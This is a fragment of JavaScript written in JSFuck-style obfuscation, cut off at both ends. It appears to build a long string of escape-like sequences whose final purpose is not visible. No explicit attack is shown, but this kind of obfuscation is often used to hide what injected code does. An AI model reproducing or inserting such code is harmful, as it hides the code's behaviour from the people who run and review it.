[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[+[]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+